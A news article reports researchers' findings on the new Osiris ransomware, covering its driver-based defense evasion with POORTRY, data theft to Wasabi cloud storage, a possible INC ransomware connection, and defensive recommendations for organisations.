Security researchers have revealed details about a new ransomware strain named Osiris, linked to an attack against a large food service franchisee operator in Southeast Asia in November 2025.
According to investigators from Symantec and VMware Carbon Black Threat Hunter Team, the attackers used a powerful defense-evasion method known as Bring Your Own Vulnerable Driver (BYOVD) — a technique where criminals exploit kernel drivers to gain high privileges and shut down security tools.
In this case, the attackers relied on a malicious driver called POORTRY, which played a key role in disabling endpoint protection before the ransomware was deployed.
This Osiris is not the older Osiris from 2016
Researchers emphasized that this Osiris ransomware appears to be a completely new family, unrelated to the older “Osiris” malware name that surfaced back in 2016 and was tied to Locky ransomware activity.
So far, the developers behind this newer ransomware remain unknown. It’s also unclear whether Osiris is being sold as a Ransomware-as-a-Service (RaaS) product or used privately by a specific group.
Possible link to INC ransomware operators
While there is no confirmed attribution yet, researchers found several indicators suggesting the threat actors may have connections to actors previously associated with INC ransomware (also known as Warble).
Key signs that raised suspicion include:
- data stolen to Wasabi cloud storage
- a Mimikatz variant using a filename seen before in INC-related intrusions (reported as
kaz.exe) - broader overlap in tooling and tradecraft
These patterns suggest Osiris may be deployed by operators with experience in enterprise ransomware playbooks.
How Osiris encrypts systems
Researchers describe Osiris as an encryption payload built by skilled attackers. The ransomware uses:
- hybrid encryption
- unique encryption keys per file
- configurable behavior (target folders/extensions)
- the ability to stop services, kill processes, and drop ransom notes
By default, Osiris attempts to terminate a long list of processes and services tied to common enterprise software and recovery tools, including applications related to:
- Microsoft Office and Exchange
- browsers like Firefox
- shadow copy mechanisms
- backup platforms such as Veeam
This is designed to increase encryption impact and reduce recovery options.
Data theft came first: cloud exfiltration before encryption
Like many modern ransomware operations, Osiris was not only about encryption. The intrusion showed clear evidence of data exfiltration before ransomware execution, using:
- Rclone
- uploads into Wasabi cloud buckets
This follows the typical “double extortion” model: steal data first, then encrypt systems to force payment.
Living-off-the-land and dual-use tools used in the intrusion
The attackers didn’t rely on one payload alone. Investigators reported the use of multiple legitimate or dual-use tools, such as:
- Netscan
- NetExec
- MeshAgent
- a modified/custom version of RustDesk (remote desktop tool)
This approach makes detection harder, because many of these tools can also be used by IT administrators.
POORTRY driver: a BYOVD twist
The POORTRY driver is notable because it differs slightly from the classic BYOVD approach.
Traditional BYOVD involves taking a legitimate driver that has known vulnerabilities and using it to disable security tools.
POORTRY, however, appears to be purpose-built — designed specifically to:
- gain elevated privileges
- terminate defensive tools more aggressively
Researchers also observed another tool called KillAV, which is commonly used to bring in vulnerable drivers to kill endpoint security processes.
Additionally, RDP was enabled in the environment, likely giving the attackers a reliable channel for remote access.
Bigger picture: ransomware remains a major enterprise threat
This incident is part of a continuing surge in ransomware activity impacting businesses worldwide.
Threat researchers reported that ransomware operators claimed thousands of victims across 2025, showing that despite takedowns and disruptions, the ransomware ecosystem remains active and adaptable.
Major ransomware players in 2025 reportedly included groups such as:
- Akira
- Qilin
- Play
- INC
- SafePay
- RansomHub
- DragonForce
- Rhysida
- CACTUS
Researchers also noted growing use of BYOVD tactics across multiple ransomware families — proving that driver-based defense bypass is becoming a standard tool in the ransomware arsenal.
Security recommendations
To reduce risk from similar targeted attacks, organizations should:
- monitor for suspicious driver installation and kernel activity
- detect unauthorized use of dual-use admin tools
- restrict and tightly control RDP exposure
- enforce MFA across privileged access
- apply application allowlisting where possible
- store backups securely (offline/immutable) and test restoration frequently
Researchers also warned that extortion is evolving beyond classic encryption. Even “encryptionless” attacks and pure data theft campaigns are rising — meaning ransomware may increasingly become just one component of broader cyber extortion operations.